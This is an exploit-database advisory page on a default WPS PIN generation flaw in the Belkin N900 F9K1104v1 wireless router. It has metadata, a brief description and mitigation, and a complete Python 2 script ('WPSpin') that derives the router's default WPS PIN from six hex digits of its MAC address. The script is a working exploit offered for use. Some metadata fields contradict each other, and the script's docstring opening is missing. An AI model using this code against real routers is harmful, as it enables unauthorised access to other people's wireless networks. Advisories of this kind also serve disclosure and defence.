Belkin Wireless Router Security Vulnerability

vendor:

Wireless Router

by:

e.novellalorente@student.ru.nl

7,8

CVSS

HIGH

Default WPS PIN Generation

287

CWE

Product Name: Wireless Router

Affected Version From: Belkin N900 F9K1104v1

Affected Version To: Other versions may also be affected.

Patch Exists: YES

Related CWE: N/A

CPE: h:belkin:f9k1104v1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Belkin Wireless Router Security Vulnerability

Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN. Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.

Mitigation:

Users should update to the latest version of the Belkin Wireless Router software to mitigate this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/57128/info

Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN.

Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.

Belkin N900 F9K1104v1 is vulnerable; other versions may also be affected.

@author       : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012
 
'''
 
import sys
 
VERSION    = 0
SUBVERSION = 2
 
def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)
 
def wps_pin_checksum(pin):
    accum = 0
 
    while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10
 
try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
except Exception:
    usage()